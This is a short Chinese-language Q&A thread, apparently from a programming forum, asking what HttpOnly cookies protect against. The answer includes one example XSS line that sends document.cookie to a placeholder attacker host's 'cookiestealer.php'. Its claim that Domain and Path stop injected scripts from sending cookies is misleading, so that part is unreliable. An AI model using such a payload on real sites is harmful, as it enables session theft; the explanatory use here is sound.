据我了解,客户端 js 无法读取 HttpOnly cookie,但它们由浏览器与任何后续请求一起传递。
如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?
HttpOnly cookie 的意义何在?
问问题
189 次
1 回答
0
如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?
不会。Domain 和 Path 属性定义了 cookie 的范围:cookie 应该发送到哪些 URL。
在此处查看“定义 cookie 的发送位置”部分。
但是如果没有 HttpOnly,攻击者可以使用 js 访问 cookie 值:
<script> document.location=”http://Attacker’sIP/cookiestealer.php?c=”document.cookie; </script>
于 2020-10-22T06:41:51.123 回答